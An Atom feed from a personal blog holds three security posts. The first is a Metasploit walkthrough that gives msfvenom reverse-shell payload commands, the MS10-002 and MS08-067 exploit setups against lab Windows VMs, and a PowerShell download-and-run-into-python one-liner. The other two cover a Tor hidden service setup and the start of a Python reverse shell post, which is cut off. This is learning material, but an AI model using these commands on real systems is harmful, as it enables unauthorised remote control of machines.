{"title":"axju - security","link":[{"@attributes":{"href":"https:\/\/axju.de\/","rel":"alternate"}},{"@attributes":{"href":"https:\/\/axju.de\/feeds\/security.atom.xml","rel":"self"}}],"id":"https:\/\/axju.de\/","updated":"2021-07-30T20:15:00+02:00","subtitle":"Just coding stuff","entry":[{"title":"Metasploit","link":{"@attributes":{"href":"https:\/\/axju.de\/posts\/2021\/07\/metasploit\/","rel":"alternate"}},"published":"2021-07-30T20:15:00+02:00","updated":"2021-07-30T20:15:00+02:00","author":{"name":"Axel Juraske"},"id":"tag:axju.de,2021-07-30:\/posts\/2021\/07\/metasploit\/","summary":"<p class=\"first last\">Fun with Metasplot, aka How To Hack<\/p>\n","content":"<p>I am a software developer and no a security researcher. But it is still\nimportant to master the current security principles. Of course you can read all\nabout it, but more fun would be to try this out. Back in the days I already play\nwith some penetration tools on\n<a class=\"reference external\" href=\"https:\/\/en.wikipedia.org\/wiki\/BackTrack\">Backtrack<\/a>.\nMostly I hacked someone WLAN, or stuff like this.<\/p>\n<p>Now its time to play with Metasploit. I don't go into too much detail, I just\ntry it out and present the results.<\/p>\n<div class=\"section\" id=\"the-basics\">\n<h2>The Basics<\/h2>\n<p>There are a lot of tools to have fun with security. We are going to use\nMetasploit. I think you can install it on your system, but I work with Kali for\nany security task I have. By the way I run Kali on\n<a class=\"reference external\" href=\"https:\/\/www.virtualbox.org\">Virtualbox<\/a>.\nWhat I also use for my vulnerable targets.<\/p>\n<blockquote>\n<ul class=\"simple\">\n<li><a class=\"reference external\" href=\"https:\/\/www.kali.org\/get-kali\/#kali-virtual-machines\">Kali<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/developer.microsoft.com\/en-us\/microsoft-edge\/tools\/vms\/#downloads\">Windows 10\/8\/7<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/developer.microsoft.com\/de-de\/windows\/downloads\/virtual-machines\/\">Windows 10 Development environment<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/isoriver.com\/windows-xp-iso-download\/\">Windows XP<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>The basic steps for exploiting a system are:<\/p>\n<blockquote>\n<ol class=\"arabic simple\">\n<li><dl class=\"first docutils\">\n<dt>Choosing and configuring an exploit<\/dt>\n<dd>Code that enters a target system by taking advantage of one of its bugs.<\/dd>\n<\/dl>\n<\/li>\n<li><dl class=\"first docutils\">\n<dt>Choosing and configuring a payload<\/dt>\n<dd>Code that will be executed on the target system upon successful entry.\nMostly this will by remote shell.<\/dd>\n<\/dl>\n<\/li>\n<li><dl class=\"first docutils\">\n<dt>Executing the exploit.<\/dt>\n<dd><!--  -->\n<\/dd>\n<\/dl>\n<\/li>\n<\/ol>\n<\/blockquote>\n<\/div>\n<div class=\"section\" id=\"example-0x01-revers-shell\">\n<h2>Example 0x01 - Revers Shell<\/h2>\n<p>You can create an executable file, that will connect to your device. Almost any\nsecurity scanner will detect this file. But anyway let us use this for the first\ntry. You may need to turn off your virus program. As you can see in the video,\nWindows also detects and deletes this file, even though I had switched off\nWindows Defender. This is the finale result, all commands below the video:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-001.gif\" style=\"width: 100%;\" \/>\n<p>First we create the execute file:<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfvenom -p windows\/meterpreter\/reverse_tcp <span class=\"nv\">LHOST<\/span><span class=\"o\">=<\/span><span class=\"m\">192<\/span>.168.178.41 <span class=\"nv\">LPORT<\/span><span class=\"o\">=<\/span><span class=\"m\">5555<\/span> -f exe &gt; shell.exe\n<\/pre><\/div>\n<p>Run web server with python to copy the file to the target:<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ python3 -m http.server\n<\/pre><\/div>\n<p>Now you can download the file on the target. Before we execute it, we have to\nsetup Metasploit. Open Metasploit<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfconsole\n<\/pre><\/div>\n<p>and set it up:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/multi\/handler\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; run\n<\/pre><\/div>\n<p>Now execute the file on the target device.<\/p>\n<\/div>\n<div class=\"section\" id=\"example-0x02-internet-explorer-6\">\n<h2>Example 0x02 - Internet Explorer 6<\/h2>\n<p>You see from the example before: If your system is up to date, it's hard to\nexecute an existing exploit. Now we will use something old, and slowly -\nInternet Explorer 6. Yes the old on from Windows XP.<\/p>\n<p>This is also a more realistic example. There is a program with a critical\nsecurity problem. If the user is interacting with the wrong data, you can take\nover the system. For this exploit: Take the Internet Explorer 6 and visit the\nwrong url.<\/p>\n<p>This is how it looks, the commands are under the video:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-002.gif\" style=\"width: 100%;\" \/>\n<p>Start Metasploit<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfconsole\n<\/pre><\/div>\n<p>and set it up:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/windows\/browser\/ms10_002_aurora\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> SRVHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">SRVHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> SRVPORT <span class=\"m\">80<\/span>\n<span class=\"nv\">SRVPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">80<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> URIPATH \/\n<span class=\"nv\">URIPATH<\/span> <span class=\"o\">=<\/span>&gt; \/\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; exploit\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Exploit running as background job <span class=\"m\">0<\/span>.\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Exploit completed, but no session was created.\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt;\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Started reverse TCP handler on <span class=\"m\">192<\/span>.168.178.41:5555\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Using URL: http:\/\/192.168.178.41:80\/\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Server started.\n<\/pre><\/div>\n<p>If you now visit  <a class=\"reference external\" href=\"http:\/\/192.168.178.41\/\">http:\/\/192.168.178.41\/<\/a> with Internet Explorer, you should see\nsomething like:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45   ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer <span class=\"s2\">&quot;Aurora&quot;<\/span> Memory Corruption\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Sending stage <span class=\"o\">(<\/span><span class=\"m\">175174<\/span> bytes<span class=\"o\">)<\/span> to <span class=\"m\">192<\/span>.168.178.45\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Meterpreter session <span class=\"m\">1<\/span> opened <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.45:1046<span class=\"o\">)<\/span> at <span class=\"m\">2021<\/span>-07-26 <span class=\"m\">04<\/span>:33:54 -0400\n<\/pre><\/div>\n<p>You can now interact with the session:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; sessions -l\n\nActive <span class=\"nv\">sessions<\/span>\n<span class=\"o\">===============<\/span>\n\n  Id  Name  Type                     Information                            Connection\n  --  ----  ----                     -----------                            ----------\n  <span class=\"m\">1<\/span>         meterpreter x86\/windows  AXJU-5980144708<span class=\"se\">\\a<\/span>xju @ AXJU-598014470  <span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.45\n                                     <span class=\"m\">8<\/span>                                      :1046 <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.45<span class=\"o\">)<\/span>\n\nmsf6 exploit<span class=\"o\">(<\/span>windows\/browser\/ms10_002_aurora<span class=\"o\">)<\/span> &gt; sessions -i <span class=\"m\">1<\/span>\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Starting interaction with <span class=\"m\">1<\/span>...\n\nmeterpreter &gt; sysinfo\nComputer        : AXJU-5980144708\nOS              : Windows XP <span class=\"o\">(<\/span><span class=\"m\">5<\/span>.1 Build <span class=\"m\">2600<\/span>, Service Pack <span class=\"m\">3<\/span><span class=\"o\">)<\/span>.\nArchitecture    : x86\nSystem Language : en_US\nDomain          : WORKGROUP\nLogged On Users : <span class=\"m\">2<\/span>\nMeterpreter     : x86\/windows\nmeterpreter &gt;\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"example-0x03-windows-xp\">\n<h2>Example 0x03 - Windows XP<\/h2>\n<p>We're still on Windows XP. But now with a program that runs in the background.\nThe user doesn't have to do anything and we can still take over the system.\nAgain the finale result and the commands are below:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-003.gif\" style=\"width: 100%;\" \/>\n<p>Start Metasploit<\/p>\n<div class=\"highlight\"><pre><span><\/span>$ msfconsole\n<\/pre><\/div>\n<p>and set it up:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/windows\/smb\/ms08_067_netapi\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD windows\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; windows\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> RHOST <span class=\"m\">192<\/span>.168.178.45\n<span class=\"nv\">RHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.45\nmsf6 exploit<span class=\"o\">(<\/span>windows\/smb\/ms08_067_netapi<span class=\"o\">)<\/span> &gt; exploit\n<\/pre><\/div>\n<p>Now you should see something like:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Started reverse TCP handler on <span class=\"m\">192<\/span>.168.178.41:5555\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Automatically detecting the target...\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Fingerprint: Windows XP - Service Pack <span class=\"m\">3<\/span> - lang:English\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Selected Target: Windows XP SP3 English <span class=\"o\">(<\/span>AlwaysOn NX<span class=\"o\">)<\/span>\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> <span class=\"m\">192<\/span>.168.178.45:445 - Attempting to trigger the vulnerability...\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Sending stage <span class=\"o\">(<\/span><span class=\"m\">175174<\/span> bytes<span class=\"o\">)<\/span> to <span class=\"m\">192<\/span>.168.178.45\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Meterpreter session <span class=\"m\">1<\/span> opened <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.45:1038<span class=\"o\">)<\/span> at <span class=\"m\">2021<\/span>-07-26 <span class=\"m\">04<\/span>:14:41 -0400\n\nmeterpreter &gt;\n<\/pre><\/div>\n<p>And this is all, now you have the control over the target system. See how\ndangers Windows XP is?<\/p>\n<\/div>\n<div class=\"section\" id=\"example-0x04-python\">\n<h2>Example 0x04 - Python<\/h2>\n<p>Of course there are also complex methods of executing code on the target system.\nThe example is similar to the first, the user has to execute a command. Which\nloads the code and runs it with Python. We assume that Python is installed on\nthe target. Since the payload is loaded directly into the memory, we can use\nWindows 10 again. And Windows Defender can also be activated.<\/p>\n<p>You know it, scroll for the commands or enjoy the video:<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/metasploit-004.gif\" style=\"width: 100%;\" \/>\n<div class=\"highlight\"><pre><span><\/span>$ msfvenom -p python\/meterpreter\/reverse_tcp  <span class=\"nv\">LHOST<\/span><span class=\"o\">=<\/span><span class=\"m\">192<\/span>.168.178.41 <span class=\"nv\">LPORT<\/span><span class=\"o\">=<\/span><span class=\"m\">5555<\/span> -f raw &gt; shell.py\n$ python3 -m http.server\n<\/pre><\/div>\n<p>Now we quick config Metasploit:<\/p>\n<div class=\"highlight\"><pre><span><\/span>msf6 &gt; use exploit\/multi\/handler\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Using configured payload generic\/shell_reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> PAYLOAD python\/meterpreter\/reverse_tcp\n<span class=\"nv\">PAYLOAD<\/span> <span class=\"o\">=<\/span>&gt; python\/meterpreter\/reverse_tcp\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LHOST <span class=\"m\">192<\/span>.168.178.41\n<span class=\"nv\">LHOST<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">192<\/span>.168.178.41\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; <span class=\"nb\">set<\/span> LPORT <span class=\"m\">5555<\/span>\n<span class=\"nv\">LPORT<\/span> <span class=\"o\">=<\/span>&gt; <span class=\"m\">5555<\/span>\nmsf6 exploit<span class=\"o\">(<\/span>multi\/handler<span class=\"o\">)<\/span> &gt; exploit\n\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Started reverse TCP handler on <span class=\"m\">192<\/span>.168.178.41:5555\n<span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Sending stage <span class=\"o\">(<\/span><span class=\"m\">39392<\/span> bytes<span class=\"o\">)<\/span> to <span class=\"m\">192<\/span>.168.178.42\n<\/pre><\/div>\n<p>On the target we open the PowerShell and execute:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">(<\/span>new-object net.webclient<span class=\"o\">)<\/span>.DownloadString<span class=\"o\">(<\/span><span class=\"s1\">&#39;http:\/\/192.168.178.41:8000\/shell.py&#39;<\/span><span class=\"o\">)<\/span> <span class=\"p\">|<\/span> python\n<\/pre><\/div>\n<p>This will load and execute the python script. Now you have access to the target\nsystem with Metasploit:<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">[<\/span>*<span class=\"o\">]<\/span> Meterpreter session <span class=\"m\">1<\/span> opened <span class=\"o\">(<\/span><span class=\"m\">192<\/span>.168.178.41:5555 -&gt; <span class=\"m\">192<\/span>.168.178.42:49636<span class=\"o\">)<\/span> at <span class=\"m\">2021<\/span>-07-26 <span class=\"m\">05<\/span>:30:28 -0400\n\nmeterpreter &gt;\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"conclusion\">\n<h2>Conclusion<\/h2>\n<p>This is funny. I enjoy playing with some security tools. And knowing some Issues\nfrom other programs will make you write better source code.<\/p>\n<\/div>\n","category":[{"@attributes":{"term":"security"}},{"@attributes":{"term":"security"}},{"@attributes":{"term":"linux"}},{"@attributes":{"term":"hacking"}},{"@attributes":{"term":"metasploit"}},{"@attributes":{"term":"reverse shell"}}]},{"title":"Hidden Service","link":{"@attributes":{"href":"https:\/\/axju.de\/posts\/2021\/02\/hidden-service\/","rel":"alternate"}},"published":"2021-02-26T20:15:00+01:00","updated":"2021-02-26T20:15:00+01:00","author":{"name":"Axel Juraske"},"id":"tag:axju.de,2021-02-26:\/posts\/2021\/02\/hidden-service\/","summary":"<p class=\"first last\">Setup a hidden service on the darknet<\/p>\n","content":"<p>I want to know how to set up a hidden service on the Tor network aka the\ndarknet. The goal is to have a copy of this blog on the darknet. Check out the\n<a class=\"reference external\" href=\"https:\/\/www.torproject.org\">Tor project<\/a> to learn more about the darknet. I\nwill only explain how to setup a hidden servers, not the darknet himself.<\/p>\n<p><strong>Tor project:<\/strong> <em>We believe everyone should be able to explore the internet with\nprivacy. We are the Tor Project, a 501(c)3 US nonprofit. We advance human rights\nand defend your privacy online through free software and open networks.<\/em>\n<a class=\"reference external\" href=\"https:\/\/www.torproject.org\/about\/people\/\">Meet our team.<\/a><\/p>\n<p>Now that you know what the Tor project is, you already have the\n<a class=\"reference external\" href=\"https:\/\/www.torproject.org\/download\/\">Tor browser<\/a> and can now read\n<a class=\"reference external\" href=\"http:\/\/z3wkaghfy4cmuqcrgskpvdava55qsbfrz5vvqthuemv2cktuwxvztcyd.onion\/\">my blog on the darknet<\/a>,\ngreat. But how do I create the hidden service for my blog? That was surprisingly\neasy. It only takes a few steps. The\n<a class=\"reference external\" href=\"https:\/\/community.torproject.org\/onion-services\/setup\/\">official documentation<\/a>\nis quite well, read it and have some fun. It wars so simple that I also want to\ncreate an example Django project behind a hidden service. Witch is just an\nexample and should work with all WSGI apps.<\/p>\n<div class=\"section\" id=\"install-tor\">\n<h2>Install tor<\/h2>\n<div class=\"highlight\"><pre><span><\/span>sudo apt-get install tor\n<\/pre><\/div>\n<p>You can check if the service is running<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo systemctl status tor.service\nsudo systemctl status tor@default.service\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"nginx\">\n<h2>Nginx<\/h2>\n<p>I built this blog with Pelican, a static page generator. Therefore, Nginx should\nonly provide some static http files.<\/p>\n<p>First install Nginx<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo apt install nginx\n<\/pre><\/div>\n<p>Then delete Nginx default site<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo rm \/etc\/nginx\/sites-enabled\/*\n<\/pre><\/div>\n<p>create the server file for my blog<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo nano \/etc\/nginx\/sites-available\/axju\n<\/pre><\/div>\n<p>with<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"k\">server<\/span> <span class=\"p\">{<\/span>\n  <span class=\"kn\">listen<\/span> <span class=\"mi\">80<\/span> <span class=\"s\">default_server<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">listen<\/span> <span class=\"s\">[::]:80<\/span> <span class=\"s\">default_server<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">server_name<\/span> <span class=\"s\">_<\/span><span class=\"p\">;<\/span>\n\n  <span class=\"kn\">root<\/span> <span class=\"s\">\/var\/www\/axju<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">index<\/span> <span class=\"s\">index.html<\/span><span class=\"p\">;<\/span>\n  <span class=\"kn\">location<\/span> <span class=\"s\">\/<\/span> <span class=\"p\">{<\/span>\n    <span class=\"kn\">try_files<\/span> <span class=\"nv\">$uri<\/span> <span class=\"nv\">$uri\/<\/span> <span class=\"p\">=<\/span><span class=\"mi\">404<\/span><span class=\"p\">;<\/span>\n  <span class=\"p\">}<\/span>\n<span class=\"p\">}<\/span>\n<\/pre><\/div>\n<p>Create the www folder for the html files<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"k\">mkdir<\/span> <span class=\"s\">\/var\/www\/axju<\/span>\n<\/pre><\/div>\n<p>I copied my files into this folder. Now enable the site and restart Nginx<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo ln -s \/etc\/nginx\/sites-available\/axju \/etc\/nginx\/sites-enabled\/\nsudo systemctl restart nginx\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"config-tor\">\n<h2>Config Tor<\/h2>\n<p>Create folder for the Tor service<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo mkdir \/var\/lib\/tor\/axju\/\nsudo chmod <span class=\"m\">700<\/span> \/var\/lib\/tor\/axju\n<\/pre><\/div>\n<p>This folder will later contain some important files for your service, like the\nhostname or the private key. Now open the configuration<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo nano \/etc\/tor\/torrc\n<\/pre><\/div>\n<p>and add this two lines<\/p>\n<div class=\"highlight\"><pre><span><\/span>HiddenServiceDir \/var\/lib\/tor\/axju\nHiddenServicePort <span class=\"m\">80<\/span> <span class=\"m\">127<\/span>.0.0.1:80\n<\/pre><\/div>\n<p>Your service should be available after a restart<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo systemctl restart tor\n<\/pre><\/div>\n<p>Get the hostname with<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo cat \/var\/lib\/tor\/axju\/hostname\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"extra-bind-a-wsgi-app\">\n<h2>Extra - bind a WSGI app<\/h2>\n<p>It was so simple that I need something challenging. I'm going to show you how to\nset up a Django project behind a hidden service. You should already know Django.<\/p>\n<div class=\"section\" id=\"setup-django\">\n<h3>1. Setup Django<\/h3>\n<p>Install requirements<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo apt install python3-pip python3-venv\n<\/pre><\/div>\n<p>Create a new folder<\/p>\n<div class=\"highlight\"><pre><span><\/span>mkdir myproject\n<span class=\"nb\">cd<\/span> myproject\n<\/pre><\/div>\n<p>Set up a new Django project with a virtual environment<\/p>\n<div class=\"highlight\"><pre><span><\/span>python3 -m venv venv\n<span class=\"nb\">source<\/span> venv\/bin\/activate\npip install django gunicorn\ndjango-admin startproject myproject .\n<\/pre><\/div>\n<p>Change the project settings just a bit<\/p>\n<div class=\"highlight\"><pre><span><\/span>nano myproject\/settings.py\n<\/pre><\/div>\n<p>Change only the line with the allowed hosts<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"nv\">ALLOWED_HOSTS<\/span> <span class=\"o\">=<\/span> <span class=\"o\">[<\/span><span class=\"s1\">&#39;*&#39;<\/span><span class=\"o\">]<\/span>\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"change-the-tor-config\">\n<h3>2. Change the Tor config<\/h3>\n<p>Open the file<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo nano \/etc\/tor\/torrc\n<\/pre><\/div>\n<p>and change the hidden service port from<\/p>\n<div class=\"highlight\"><pre><span><\/span>...\nHiddenServicePort <span class=\"m\">80<\/span> <span class=\"m\">127<\/span>.0.0.1:80\n<\/pre><\/div>\n<p>to<\/p>\n<div class=\"highlight\"><pre><span><\/span>...\nHiddenServicePort <span class=\"m\">80<\/span> <span class=\"m\">127<\/span>.0.0.1:8000\n<\/pre><\/div>\n<p>Restart Tor<\/p>\n<div class=\"highlight\"><pre><span><\/span>sudo systemctl restart tor\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"run-gunicorn\">\n<h3>Run gunicorn<\/h3>\n<p>Run gunicorn to bind the WSGI app<\/p>\n<div class=\"highlight\"><pre><span><\/span>gunicorn --bind <span class=\"m\">127<\/span>.0.0.1:8000 myproject.wsgi\n<\/pre><\/div>\n<p>Of course this is just an example. If you are setup a real service, you will use\na systemd service or something similar.<\/p>\n<\/div>\n<\/div>\n<div class=\"section\" id=\"final-notes\">\n<h2>Final notes<\/h2>\n<p>Yes that wars easy and yes you have to do more to hide your service.<\/p>\n<blockquote>\n<ul class=\"simple\">\n<li><a class=\"reference external\" href=\"https:\/\/riseup.net\/en\/security\/network-security\/tor\/onionservices-best-practices\">Onion services best practices<\/a> by Riseup Collective<\/li>\n<li><a class=\"reference external\" href=\"https:\/\/community.torproject.org\/onion-services\/advanced\/opsec\/\">Operational Security<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<p>I also setup Jenkins to automate the publishing. The darknet copy of this blog\nwill always be a little bit newer than the main build. Uses the tor browser to\nbe the first one to read my post.<\/p>\n<\/div>\n","category":[{"@attributes":{"term":"security"}},{"@attributes":{"term":"security"}},{"@attributes":{"term":"linux"}},{"@attributes":{"term":"darknet"}},{"@attributes":{"term":"tor"}}]},{"title":"A reverse shell with Python","link":{"@attributes":{"href":"https:\/\/axju.de\/posts\/2021\/02\/a-reverse-shell-with-python\/","rel":"alternate"}},"published":"2021-02-19T19:00:00+01:00","updated":"2021-02-19T19:00:00+01:00","author":{"name":"Axel Juraske"},"id":"tag:axju.de,2021-02-19:\/posts\/2021\/02\/a-reverse-shell-with-python\/","summary":"<p class=\"first last\">I'll show you how to create a reverse shell using Python and how to make the server public using ngrok<\/p>\n","content":"<p><strong>Disclaimer<\/strong>: The described methods should only be used for systems which you\nhave access rights. I used this method to get access to my mums PC, which I was\nallowed. And yes, I'm 31, have my own family, but still help my mom with her PC.<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/reverse-shell-003.gif\" style=\"width: 100%;\" \/>\n<div class=\"section\" id=\"some-basics\">\n<h2>Some basics<\/h2>\n<p>What is a reverse shell? With a reverse shell, the target makes the connection.\nOn your client is run a server program, which listening for incoming\nconnections. And the target execute a program, which connect to your client.\nThen you can run commands on the target from your client. My research:<\/p>\n<blockquote>\n<ul class=\"simple\">\n<li><a class=\"reference external\" href=\"https:\/\/www.acunetix.com\/blog\/web-security-zone\/what-is-reverse-shell\/\">Acunetix<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/www.thepythoncode.com\/article\/create-reverse-shell-python\">PythonCode<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/www.netsparker.com\/blog\/web-security\/understanding-reverse-shells\/\">netsparker<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<\/div>\n<div class=\"section\" id=\"python\">\n<h2>Python<\/h2>\n<p>We will write two small Python scripts one for the server and one for the\nclient. The only modules we use are\n<a class=\"reference external\" href=\"https:\/\/docs.python.org\/3\/library\/socket.html\">sockets<\/a> and the\n<a class=\"reference external\" href=\"https:\/\/docs.python.org\/3\/library\/subprocess.html\">subprocess<\/a>. Make sure you\nhave read the documentation. The programs are short and self-explanatory,\nnothing complicated just a little loop.<\/p>\n<div class=\"section\" id=\"server\">\n<h3>Server<\/h3>\n<div class=\"highlight\"><pre><span><\/span><span class=\"kn\">import<\/span> <span class=\"nn\">socket<\/span>\n\n<span class=\"n\">HOST<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;0.0.0.0&#39;<\/span>\n<span class=\"n\">PORT<\/span> <span class=\"o\">=<\/span> <span class=\"mi\">5555<\/span>\n\n<span class=\"c1\"># set up the socket so that it waits for an incoming connection<\/span>\n<span class=\"n\">s<\/span> <span 